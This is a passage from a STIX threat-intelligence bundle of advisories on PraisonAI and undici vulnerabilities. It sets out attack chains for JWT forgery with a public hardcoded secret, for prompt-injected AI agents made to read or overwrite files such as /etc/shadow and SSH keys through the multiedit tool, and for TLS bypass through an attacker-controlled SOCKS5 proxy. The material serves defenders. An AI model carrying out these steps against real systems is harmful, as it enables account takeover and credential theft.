0.1.4` in your software supply chain.\n*   **Log Configuration**: Ensure application logs are configured to capture environment variable settings on process startup, if possible, to detect instances where `PLATFORM_JWT_SECRET` is unset or `PLATFORM_ENV` defaults to `dev`.\n",
      "published": "2026-06-18T14:43:44Z",
      "labels": [
        "authentication-bypass",
        "hardcoded-credentials",
        "jwt-forgery",
        "python",
        "supply-chain",
        "misconfiguration"
      ],
      "object_refs": [
        "indicator--0fbed093-c73a-5ad1-8f1d-817660f2cdaf",
        "indicator--0980c1e6-1afa-5e92-9516-433c8d739af7",
        "indicator--9bf6744a-63fd-5b13-ba5a-725d15aa9452",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-cwj8-6gp2-ggcw"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e90db0a4-37db-5d3c-9897-6d3c1f78ff27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "credential: dev-secret-change-me",
      "pattern": "[x-ti-bot:credential = 'dev-secret-change-me']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:45:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8accd426-ba0f-593c-ba71-3d139d6bdb47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "target_ref": "indicator--e90db0a4-37db-5d3c-9897-6d3c1f78ff27"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17ed5adf-7115-56a5-b658-b376ad6b38f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a6e83ff-f00f-5e52-8317-29cde6ef1c45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04686dd7-a10f-5bd9-8382-6f8c931db7cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Access Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1531",
          "url": "https://attack.mitre.org/techniques/T1531"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c50cff03-4171-5ca8-9883-c0462b4a9844",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "target_ref": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--de5bf491-dc72-5c22-8dca-d32ecd4c749d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Praisonai-platform Critical Authentication Bypass Due to Persistent Hardcoded JWT Secret",
      "description": "## Overview\n\nThe `praisonai-platform` (PyPI) package, specifically versions up to and including 0.1.4, is critically vulnerable to an authentication bypass. Despite a previous advisory (GHSA-3qg8-5g3r-79v5) claiming a patch in 0.1.4, the vulnerability persists. The platform's JSON Web Tokens (JWTs) are signed using a hardcoded secret, \"dev-secret-change-me\", which is publicly known from the source code. The intended production guard, designed to prevent this, is default-open because it only triggers when `PLATFORM_ENV` is *not* \"dev\", but `PLATFORM_ENV` defaults to \"dev\" if not explicitly set. This flaw allows any unauthenticated attacker to forge valid JWTs, impersonate any user (including workspace owners), and gain complete unauthorized access. This issue affects any default deployment of `praisonai-platform` 0.1.4 that does not explicitly set a strong `PLATFORM_JWT_SECRET`.\n\n## Attack Chain\n\n1.  **Reconnaissance**: Attacker identifies a `praisonai-platform` instance, potentially using `uvicorn praisonai_platform.api.app:app` or `python -m praisonai_platform`.\n2.  **Information Gathering**: Attacker accesses the public source code of `praisonai-platform` 0.1.4 to retrieve the hardcoded JWT secret \"dev-secret-change-me\".\n3.  **Credential Forgery**: Attacker crafts a malicious JWT payload (e.g., `{\"sub\": \"target_user_id\", \"email\": \"victim@target\", \"exp\": \"future_timestamp\"}`).\n4.  **JWT Signing**: Attacker signs the crafted JWT payload using the publicly known `dev-secret-change-me` secret and the `HS256` algorithm.\n5.  **Authentication Bypass**: Attacker sends requests to the `praisonai-platform` API with the forged JWT in the `Authorization` header. The platform's `_verify_token` function, also using the default secret, validates the token and authenticates the attacker as `target_user_id`.\n6.  **Privilege Escalation**: If the `target_user_id` is a known workspace owner's ID (which can be discovered from member listings or logs), the attacker gains owner-level access to the workspace.\n7.  **Impact**: Attacker leverages owner privileges to perform actions such as deleting workspaces, evicting legitimate members, or exfiltrating data, leading to resource destruction or denial of service.\n\n## Impact\n\nAny deployment of `praisonai-platform` 0.1.4 that runs without explicitly setting a strong `PLATFORM_JWT_SECRET` is immediately vulnerable. This includes the default startup commands like `python -m praisonai_platform --host 0.0.0.0 --port 8000` which do not configure the necessary environment variables. The direct consequences include complete unauthenticated authentication bypass, allowing an attacker to mint valid session tokens for any user. With a known user ID (obtainable from member lists or logs), attackers can achieve workspace-owner takeover, leading to the read, update, and deletion of all resources within that workspace, and member management. This enables resource destruction and lock-out, such as deleting entire workspaces or evicting legitimate users, resulting in an irrecoverable denial of service. The initial vulnerability (GHSA-3qg8) was scored 9.8 Critical on CVSS.\n\n## Recommendation\n\n*   Immediately update `praisonai-platform` to a version where the vulnerability is confirmed patched, or implement the suggested fix to remove the default secret and enforce `PLATFORM_JWT_SECRET` at startup.\n*   Review application logs for the presence of the `RuntimeError` message indicating the default secret is in use in a production environment, as described in the `Detect Praisonai-Platform Default Secret Guard RuntimeError` Sigma rule.\n*   Search code repositories and configuration files for the hardcoded secret `dev-secret-change-me` to ensure it's not present in active deployments.\n*   Deploy the `Detect Praisonai-Platform Uvicorn Default Startup` Sigma rule to identify systems running the vulnerable application entry point.\n*   Rotate all JWT signing keys if this secret has been used in any production environment, assuming compromise.\n",
      "published": "2026-06-18T14:45:36Z",
      "labels": [
        "authentication-bypass",
        "hardcoded-credentials",
        "jwt",
        "python",
        "web-application",
        "supply-chain"
      ],
      "object_refs": [
        "indicator--e90db0a4-37db-5d3c-9897-6d3c1f78ff27",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f38v-77qj-h4jq"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9740f82e-3f14-53a6-b37f-9980c16e74cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--171b26ec-798d-52cb-9222-ab762af6c26f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3fd4a92c-79fa-5062-9544-c1366f4a908b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38dde3f2-9892-56a5-ac52-b8e45006785a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f874a30c-8d67-56fd-9e60-c09f7b073b48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ecb72789-3a23-5439-88f2-d774e3b2a1a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI `multiedit` Tool Vulnerability Allows Arbitrary File Read/Write and RCE",
      "description": "## Overview\n\nA severe arbitrary file read and write vulnerability has been discovered in the `multiedit` tool within the PraisonAI framework, impacting versions prior to 4.6.61. This flaw, tracked as GHSA-29w3-p9w9-wc47, arises from a complete lack of path validation, workspace boundary checks, or protected path guards when the `filepath` parameter is used with `open()` for both read and write operations. Threat actors can exploit this by crafting malicious prompts, user inputs in chatbots, or YAML workflow configurations that influence an AI agent's arguments to the `multiedit` tool. This allows for the exfiltration of sensitive information, such as SSH keys and cloud credentials, and the overwrite of critical system or application files, potentially leading to privilege escalation and remote code execution on affected systems.\n\n## Attack Chain\n\n1.  **Initial Access**: A threat actor crafts malicious input (e.g., a specially designed prompt, a user message in a chatbot, or a YAML workflow configuration) to influence the arguments of an AI agent utilizing the PraisonAI framework.\n2.  **Agent Interaction**: The AI agent, operating with the vulnerable PraisonAI `multiedit` tool, receives and processes the attacker-controlled input, which specifies a malicious `filepath` parameter.\n3.  **Tool Execution**: The AI agent invokes the `multiedit` tool (e.g., via `python -c \"import praisonai.tools.multiedit; multiedit('/etc/shadow', ...)\"`) with the unvalidated `filepath`.\n4.  **Arbitrary File Read**: The `multiedit` tool, due to missing path validation, attempts to read content from the attacker-specified sensitive file (e.g., `/etc/shadow`, `~/.ssh/id_rsa`) and leaks it via the `dry_run` output or other return mechanisms.\n5.  **Arbitrary File Write**: Simultaneously or subsequently, the attacker can use the `multiedit` tool to write to or overwrite critical system or user configuration files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`, web application source code).\n6.  **Privilege Escalation / Persistence**: By writing to files like `authorized_keys` or shell startup scripts, the attacker establishes persistence, gains elevated privileges, or achieves remote code execution upon the next login or script execution.\n7.  **Impact**: The attacker exfiltrates sensitive data (step 4) or executes arbitrary commands (step 6), leading to full system compromise, data destruction, or further network lateral movement.\n\n## Impact\n\nThis vulnerability poses a critical risk to PraisonAI deployments, particularly where AI agents interact with user-provided input or process untrusted configurations with `auto_approve_tools=True`. Successful exploitation allows attackers, who can influence the `filepath` parameter, to read any file accessible by the PraisonAI process user, including highly sensitive data like SSH private keys (`~/.ssh/id_rsa`), AWS credentials (`~/.aws/credentials`), `/etc/shadow`, and `.env` files. Furthermore, attackers can overwrite arbitrary files, enabling various destructive outcomes such as defacing web applications, injecting malicious scripts into startup files (`.bashrc`), or gaining persistent access and privilege escalation by writing to `authorized_keys`. The broad impact on confidentiality, integrity, and availability makes this a severe threat for affected organizations.\n\n## Recommendation\n\n*   Upgrade the `praisonai` package to version `4.6.61` or later immediately to remediate the GHSA-29w3-p9w9-wc47 vulnerability.\n*   Deploy the provided Sigma rules to your SIEM for detection of suspicious Python activity targeting sensitive files.\n*   Ensure Sysmon process-creation and file-event logging is enabled on systems running PraisonAI agents to activate the rules above.\n*   If possible, configure PraisonAI agents to require explicit approval for tool usage (e.g., using `@require_approval(risk_level=\"high\")` on sensitive tools) instead of `auto_approve_tools=True`.\n",
      "published": "2026-06-18T14:47:14Z",
      "labels": [
        "LLM",
        "AI",
        "supply-chain",
        "arbitrary-file-read",
        "arbitrary-file-write",
        "path-traversal",
        "RCE"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-29w3-p9w9-wc47"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a7038d6a-0b50-584f-87be-590da1edd8ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e1ca04e0-bab3-5118-a16b-2e327c2599ca",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--576256af-e58d-59d5-a506-3cf645c4700a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e1ca04e0-bab3-5118-a16b-2e327c2599ca",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bcc5eaa7-21b1-564a-b117-f5e6d56f2af6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e1ca04e0-bab3-5118-a16b-2e327c2599ca",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Resource Hijacking",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb51be59-d771-5d94-9eb4-2bb9bd432c8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e1ca04e0-bab3-5118-a16b-2e327c2599ca",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e1ca04e0-bab3-5118-a16b-2e327c2599ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "npm PraisonAI AgentOS Unauthenticated API Exposure",
      "description": "## Overview\n\nThe npm `praisonai` package, specifically versions `\u003e= 1.6.0` through `1.7.1`, contains a critical vulnerability in its TypeScript `AgentOS` HTTP server component. This server defaults to binding on `0.0.0.0` (all network interfaces) and fails to implement any authentication or authorization checks for sensitive API endpoints. Attackers who can reach a running `AgentOS` instance can unauthenticatedly enumerate agent names, roles, and partial instructions via `GET /api/agents`, and crucially, can invoke configured agents via `POST /api/chat`. This directly contradicts PraisonAI's own security documentation regarding hardened API servers and exposes organizations using the affected versions to significant risks, including unauthorized data access, manipulation of systems through agent actions, and resource exhaustion.\n\n## Attack Chain\n\n1.  Attacker identifies an internet-facing host running the `praisonai` `AgentOS` server (e.g., on default port 8000), which is listening on `0.0.0.0`.\n2.  Attacker sends an unauthenticated `GET` request to `/api/agents` (or a configured `apiPrefix`) to enumerate active agent names, roles, and up to 100 characters of their instructions.\n3.  The `AgentOS` server responds with sensitive metadata, such as an agent named \"finance-admin\" with instructions like \"poc SECRET: refund-wire-tool may alter customer balances\".\n4.  Attacker crafts a malicious prompt or command based on the disclosed agent information and observed functionality.\n5.  Attacker sends an unauthenticated `POST` request to `/api/chat` (or `apiPrefix/chat`), containing the malicious input targeted at a selected agent.\n6.  The `AgentOS` server invokes the target agent's `chat` function with the attacker's input, triggering unauthorized actions within the agent's configured environment.\n7.  Depending on the agent's capabilities (e.g., access to tools, external APIs, credentials, file system), this leads to data exfiltration, system modification, or resource consumption.\n\n## Impact\n\nAn attacker successfully exploiting this vulnerability can cause severe damage. The primary impact is unauthorized access and control over configured PraisonAI agents. This can lead to the compromise of sensitive data through `GET /api/agents` revealing internal workflows and specific instructions, or more critically, through `POST /api/chat` by inducing agents to exfiltrate data, interact with internal systems, or manipulate workflows. While the report does not claim arbitrary code execution by default, if agents are configured with access to tools (e.g., file system, shell execution, external APIs with credentials), unauthenticated invocation effectively becomes an entry point for those powerful capabilities, leading to potential complete system compromise or data destruction. All organizations deploying `praisonai` npm package versions `\u003e= 1.6.0, \u003c= 1.7.1` in an exposed manner are at risk.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM for webserver logs to detect unauthenticated access attempts to `/api/agents` and `/api/chat`.\n*   Ensure your network perimeter blocks unsolicited inbound connections to `praisonai AgentOS` instances running on `0.0.0.0` and default ports (e.g., 8000) from untrusted networks.\n*   Prioritize updating the `praisonai` npm package to a fixed version once released; if an immediate patch is unavailable, implement custom authentication middleware for affected `AgentOS` instances.\n*   Monitor web server logs for `GET` requests to `/api/agents` and `POST` requests to `/api/chat` originating from unexpected source IPs or without expected authentication headers, as detected by the rules.\n",
      "published": "2026-06-18T14:48:13Z",
      "labels": [
        "api-abuse",
        "unauthenticated-access",
        "information-disclosure",
        "server-side-request-forgery",
        "web",
        "node.js",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9752-mhqh-h34f"
        }
      ],
      "confidence": 95
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6f4b2028-9c1f-5403-94a0-3bcce85f7e20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "undici TLS Validation Bypass via SOCKS5 ProxyAgent (CVE-2026-9697)",
      "description": "## Overview\n\nThe `undici` HTTP/1.1 client for Node.js, specifically its `ProxyAgent` component, is affected by CVE-2026-9697, a critical TLS certificate validation bypass vulnerability. This flaw, introduced in `undici` versions 7.23.0 and 8.0.0, occurs when the `ProxyAgent` is configured to use a SOCKS5 proxy. In such scenarios, the `requestTls` option, intended for strict TLS validation (e.g., pinning to internal CAs or custom certificates), is silently ignored. As a result, HTTPS connections established through the SOCKS5 tunnel default to Node.js's standard trust store. This allows an attacker, capable of performing a Man-in-the-Middle (MITM) attack, to present any valid certificate signed by a publicly trusted Certificate Authority, thereby bypassing the application's intended certificate pinning and enabling the interception and potential manipulation of encrypted traffic. Defenders should prioritize patching and reassess network configurations involving `undici` and SOCKS5 proxies.\n\n## Attack Chain\n\n1.  **Initial Access (Attacker Pre-condition):** An attacker establishes a Man-in-the-Middle (MITM) position, enabling them to intercept network traffic between a vulnerable Node.js application and its target HTTPS server (e.g., via DNS poisoning, rogue Wi-Fi, compromised network infrastructure, or controlling the SOCKS5 proxy itself).\n2.  **Vulnerable Application Execution:** A Node.js application, utilizing `undici`'s `ProxyAgent` (or `Socks5ProxyAgent` directly) with a SOCKS5 proxy URI (e.g., `socks5://proxy.attacker.com`), attempts to establish an HTTPS connection to a target server, while being configured to enforce strict TLS validation via the `requestTls` option (e.g., pinning to a custom Certificate Authority).\n3.  **TLS Option Dropped:** Due to the vulnerability (CVE-2026-9697), `undici`'s `ProxyAgent` silently disregards the `requestTls` configuration (including `ca`, `cert`, `key`, `rejectUnauthorized`, `servername`) that was specified for the outgoing HTTPS connection.\n4.  **Fallback to Default Trust Store:** The vulnerable application proceeds to establish the HTTPS connection, but instead of using the application's defined `requestTls` settings, it defaults to Node.js's standard trust store (typically the Mozilla CA bundle) for validating the target server's certificate.\n5.  **Attacker Certificate Presentation:** The attacker, from their MITM vantage point, intercepts the TLS handshake and presents a valid HTTPS certificate for the target hostname, which is signed by *any* publicly trusted Certificate Authority.\n6.  **Certificate Acceptance and MITM:** The vulnerable application, now relying on the default trust store, accepts the attacker's certificate as legitimate because it is signed by a publicly trusted CA. This bypasses the application's intended strict TLS pinning and validation.\n7.  **Data Interception and Tampering:** The attacker can now transparently decrypt, inspect, modify, and re-encrypt the HTTPS traffic flowing between the vulnerable Node.js application and the legitimate target server, allowing for full Man-in-the-Middle capabilities.\n\n## Impact\n\nThe impact of CVE-2026-9697 is severe for applications relying on `undici`'s `ProxyAgent` with SOCKS5 proxies for secure HTTPS communication, especially those implementing certificate pinning or custom CA trust. If exploited, an attacker positioned in a Man-in-the-Middle (MITM) role can completely bypass intended TLS security controls. This allows them to intercept sensitive data transmitted over HTTPS, including credentials, personal identifiable information (PII), and proprietary business data. Furthermore, the attacker can tamper with this data, potentially leading to unauthorized transactions, data corruption, or execution of malicious commands within the application's context. While specific victim counts are not available, any organization using affected `undici` versions in conjunction with SOCKS5 proxies for critical application-to-application communication is at risk.\n\n## Recommendation\n\n*   **Upgrade undici immediately:** Upgrade affected Node.js applications to `undici` v7.28.0 or v8.5.0 to remediate CVE-2026-9697.\n*   **Deploy package version detection:** Deploy the provided Sigma rule \"Detect Vulnerable undici Package Versions (CVE-2026-9697)\" to identify affected systems within your environment.\n*   **Implement workaround if upgrade isn't possible:** If an immediate upgrade is not feasible, reconfigure `ProxyAgent` to route traffic through an HTTP-proxy instead of SOCKS5 when `requestTls` is required for strict validation, as `requestTls` is honored correctly for HTTP proxies.\n*   **Monitor for Node.js SOCKS5 usage:** Deploy the \"Detect Node.js Process Initiating SOCKS5 Proxy Connection\" Sigma rule to identify Node.js applications potentially using SOCKS5 proxies, which may indicate vulnerable configurations if combined with `undici`.\n",
      "published": "2026-06-18T14:51:27Z",
      "labels": [
        "vulnerability",
        "tls-bypass",
        "node.js",
        "npm"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vmh5-mc38-953g"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Resource Exhaustion",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed42c6da-5861-5f31-ae55-cb639344f77a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1327568b-55c7-5b17-b0d9-4bc57200c002",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1327568b-55c7-5b17-b0d9-4bc57200c002",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "undici WebSocket Client Vulnerable to Denial of Service (CVE-2026-12151)",
